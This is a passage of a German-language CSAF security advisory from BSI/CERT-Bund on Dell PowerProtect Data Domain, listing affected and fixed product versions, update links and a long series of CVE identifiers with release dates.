          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-38546"
    },
    {
      "cve": "CVE-2023-39197",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-39197"
    },
    {
      "cve": "CVE-2023-39198",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-39198"
    },
    {
      "cve": "CVE-2023-39804",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-39804"
    },
    {
      "cve": "CVE-2023-40217",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-40217"
    },
    {
      "cve": "CVE-2023-42465",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-42465"
    },
    {
      "cve": "CVE-2023-4255",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-4255"
    },
    {
      "cve": "CVE-2023-45139",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-45139"
    },
    {
      "cve": "CVE-2023-45322",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-45322"
    },
    {
      "cve": "CVE-2023-45863",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-45863"
    },
    {
      "cve": "CVE-2023-45871",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-45871"
    },
    {
      "cve": "CVE-2023-46136",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-46136"
    },
    {
      "cve": "CVE-2023-46218",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-46218"
    },
    {
      "cve": "CVE-2023-46219",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-46219"
    },
    {
      "cve": "CVE-2023-46751",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-46751"
    },
    {
      "cve": "CVE-2023-48795",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-48795"
    },
    {
      "cve": "CVE-2023-49083",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-49083"
    },
    {
      "cve": "CVE-2023-50447",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-50447"
    },
    {
      "cve": "CVE-2023-5049",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-5049"
    },
    {
      "cve": "CVE-2023-50495",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-50495"
    },
    {
      "cve": "CVE-2023-50782",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-50782"
    },
    {
      "cve": "CVE-2023-51257",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-51257"
    },
    {
      "cve": "CVE-2023-52425",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-52425"
    },
    {
      "cve": "CVE-2023-52426",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-52426"
    },
    {
      "cve": "CVE-2023-5678",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-5678"
    },
    {
      "cve": "CVE-2023-5717",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-5717"
    },
    {
      "cve": "CVE-2023-5752",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-5752"
    },
    {
      "cve": "CVE-2023-6004",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-6004"
    },
    {
      "cve": "CVE-2023-6597",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-6597"
    },
    {
      "cve": "CVE-2023-6918",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-6918"
    },
    {
      "cve": "CVE-2023-7207",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2023-7207"
    },
    {
      "cve": "CVE-2024-0450",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-0450"
    },
    {
      "cve": "CVE-2024-0727",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-0727"
    },
    {
      "cve": "CVE-2024-0985",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-0985"
    },
    {
      "cve": "CVE-2024-21626",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-21626"
    },
    {
      "cve": "CVE-2024-22195",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-22195"
    },
    {
      "cve": "CVE-2024-22365",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-22365"
    },
    {
      "cve": "CVE-2024-23651",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-23651"
    },
    {
      "cve": "CVE-2024-23652",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-23652"
    },
    {
      "cve": "CVE-2024-23653",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-23653"
    },
    {
      "cve": "CVE-2024-23672",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-23672"
    },
    {
      "cve": "CVE-2024-24549",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-24549"
    },
    {
      "cve": "CVE-2024-25062",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-25062"
    },
    {
      "cve": "CVE-2024-26130",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-26130"
    },
    {
      "cve": "CVE-2024-26458",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-26458"
    },
    {
      "cve": "CVE-2024-26461",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-26461"
    },
    {
      "cve": "CVE-2024-28085",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-28085"
    },
    {
      "cve": "CVE-2024-28182",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-28182"
    },
    {
      "cve": "CVE-2024-28219",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-28219"
    },
    {
      "cve": "CVE-2024-28757",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-28757"
    }
  ]
}
  WID-SEC-W-2024-3377
Vulnerability from csaf_certbund
Notes
{
  "document": {
    "aggregate_severity": {
      "text": "mittel"
    },
    "category": "csaf_base",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "de-DE",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
      },
      {
        "category": "description",
        "text": "Dell PowerProtect Data Domain Appliances sind speziell f\u00fcr Backup und Daten-Deduplizierung ausgelegte Systeme.",
        "title": "Produktbeschreibung"
      },
      {
        "category": "summary",
        "text": "Ein lokaler Angreifer kann mehrere Schwachstellen in Dell PowerProtect Data Domain ausnutzen, um seine Privilegien zu erh\u00f6hen, Informationen offenzulegen und um nicht n\u00e4her beschriebene Auswirkungen zu erzielen.",
        "title": "Angriff"
      },
      {
        "category": "general",
        "text": "- Sonstiges",
        "title": "Betroffene Betriebssysteme"
      }
    ],
    "publisher": {
      "category": "other",
      "contact_details": "csaf-provider@cert-bund.de",
      "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
      "namespace": "https://www.bsi.bund.de"
    },
    "references": [
      {
        "category": "self",
        "summary": "WID-SEC-W-2024-3377 - CSAF Version",
        "url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-3377.json"
      },
      {
        "category": "self",
        "summary": "WID-SEC-2024-3377 - Portal Version",
        "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-3377"
      },
      {
        "category": "external",
        "summary": "Dell Security Update",
        "url": "https://www.dell.com/support/kbdoc/de-de/000245360/dsa-2024-424-security-update-for-dell-pdsa-2024-424-security-update-for-dell-powerprotect-dd-vulnerabilityowerprotect-dd-vulnerability"
      },
      {
        "category": "external",
        "summary": "Security Update for Dell PowerProtect Data Domain",
        "url": "https://www.dell.com/support/kbdoc/en-us/000348708/dsa-2025-159-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities"
      }
    ],
    "source_lang": "en-US",
    "title": "Dell PowerProtect Data Domain: Mehrere Schwachstellen",
    "tracking": {
      "current_release_date": "2025-08-04T22:00:00.000+00:00",
      "generator": {
        "date": "2025-08-05T07:21:01.974+00:00",
        "engine": {
          "name": "BSI-WID",
          "version": "1.4.0"
        }
      },
      "id": "WID-SEC-W-2024-3377",
      "initial_release_date": "2024-11-07T23:00:00.000+00:00",
      "revision_history": [
        {
          "date": "2024-11-07T23:00:00.000+00:00",
          "number": "1",
          "summary": "Initiale Fassung"
        },
        {
          "date": "2025-08-04T22:00:00.000+00:00",
          "number": "2",
          "summary": "Neue Updates von Dell aufgenommen"
        }
      ],
      "status": "final",
      "version": "2"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c8.1.0.0",
                "product": {
                  "name": "Dell PowerProtect Data Domain \u003c8.1.0.0",
                  "product_id": "T038861"
                }
              },
              {
                "category": "product_version",
                "name": "8.1.0.0",
                "product": {
                  "name": "Dell PowerProtect Data Domain 8.1.0.0",
                  "product_id": "T038861-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:dell:powerprotect_data_domain:8.1.0.0"
                  }
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c7.13.1.10",
                "product": {
                  "name": "Dell PowerProtect Data Domain \u003c7.13.1.10",
                  "product_id": "T038862"
                }
              },
              {
                "category": "product_version",
                "name": "7.13.1.10",
                "product": {
                  "name": "Dell PowerProtect Data Domain 7.13.1.10",
                  "product_id": "T038862-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:dell:powerprotect_data_domain:7.13.1.10"
                  }
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c7.10.1.40",
                "product": {
                  "name": "Dell PowerProtect Data Domain \u003c7.10.1.40",
                  "product_id": "T038863"
                }
              },
              {
                "category": "product_version",
                "name": "7.10.1.40",
                "product": {
                  "name": "Dell PowerProtect Data Domain 7.10.1.40",
                  "product_id": "T038863-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:dell:powerprotect_data_domain:7.10.1.40"
                  }
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c7.7.5.50",
                "product": {
                  "name": "Dell PowerProtect Data Domain \u003c7.7.5.50",
                  "product_id": "T038864"
                }
              },
              {
                "category": "product_version",
                "name": "7.7.5.50",
                "product": {
                  "name": "Dell PowerProtect Data Domain 7.7.5.50",
                  "product_id": "T038864-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:dell:powerprotect_data_domain:7.7.5.50"
                  }
                }
              },
              {
                "category": "product_name",
                "name": "Dell PowerProtect Data Domain",
                "product": {
                  "name": "Dell PowerProtect Data Domain",
                  "product_id": "T045852",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:dell:powerprotect_data_domain:-"
                  }
                }
              }
            ],
            "category": "product_name",
            "name": "PowerProtect Data Domain"
          },
          {
            "category": "product_name",
            "name": "Dell PowerProtect Data Domain Management Center",
            "product": {
              "name": "Dell PowerProtect Data Domain Management Center",
              "product_id": "T045853",
              "product_identification_helper": {
                "cpe": "cpe:/a:dell:powerprotect_data_domain_management_center:-"
              }
            }
          },
          {
            "category": "product_name",
            "name": "Dell PowerProtect Data Domain OS",
            "product": {
              "name": "Dell PowerProtect Data Domain OS",
              "product_id": "T045854",
              "product_identification_helper": {
                "cpe": "cpe:/o:dell:powerprotect_data_domain_os:-"
              }
            }
          }
        ],
        "category": "vendor",
        "name": "Dell"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2024-45759",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-45759"
    },
    {
      "cve": "CVE-2024-48010",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-48010"
    },
    {
      "cve": "CVE-2024-48011",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2024-48011"
    },
    {
      "cve": "CVE-2017-16829",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2017-16829"
    },
    {
      "cve": "CVE-2017-5849",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2017-5849"
    },
    {
      "cve": "CVE-2018-7208",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2018-7208"
    },
    {
      "cve": "CVE-2019-14889",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2019-14889"
    },
    {
      "cve": "CVE-2020-12912",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2020-12912"
    },
    {
      "cve": "CVE-2020-16135",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2020-16135"
    },
    {
      "cve": "CVE-2020-1730",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2020-1730"
    },
    {
      "cve": "CVE-2020-24455",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2020-24455"
    },
    {
      "cve": "CVE-2020-8694",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2020-8694"
    },
    {
      "cve": "CVE-2020-8695",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2020-8695"
    },
    {
      "cve": "CVE-2021-27219",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2021-27219"
    },
    {
      "cve": "CVE-2021-3565",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2021-3565"
    },
    {
      "cve": "CVE-2021-3634",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2021-3634"
    },
    {
      "cve": "CVE-2022-1210",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-1210"
    },
    {
      "cve": "CVE-2022-1622",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-1622"
    },
    {
      "cve": "CVE-2022-1996",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-1996"
    },
    {
      "cve": "CVE-2022-22576",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-22576"
    },
    {
      "cve": "CVE-2022-25313",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-25313"
    },
    {
      "cve": "CVE-2022-27774",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-27774"
    },
    {
      "cve": "CVE-2022-27775",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-27775"
    },
    {
      "cve": "CVE-2022-27776",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-27776"
    },
    {
      "cve": "CVE-2022-27781",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-27781"
    },
    {
      "cve": "CVE-2022-27782",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-27782"
    },
    {
      "cve": "CVE-2022-29361",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-29361"
    },
    {
      "cve": "CVE-2022-32205",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-32205"
    },
    {
      "cve": "CVE-2022-32206",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-32206"
    },
    {
      "cve": "CVE-2022-32207",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-32207"
    },
    {
      "cve": "CVE-2022-32208",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-32208"
    },
    {
      "cve": "CVE-2022-32221",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-32221"
    },
    {
      "cve": "CVE-2022-35252",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-35252"
    },
    {
      "cve": "CVE-2022-40023",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-40023"
    },
    {
      "cve": "CVE-2022-40090",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-40090"
    },
    {
      "cve": "CVE-2022-42915",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
      "release_date": "2024-11-07T23:00:00.000+00:00",
      "title": "CVE-2022-42915"
    },
    {
      "cve": "CVE-2022-42916",
      "product_status": {
        "known_affected": [
          "T045853",
          "T045852",
          "T045854",
          "T038864",
          "T038863",
          "T038862",
          "T038861"
        ]
      },
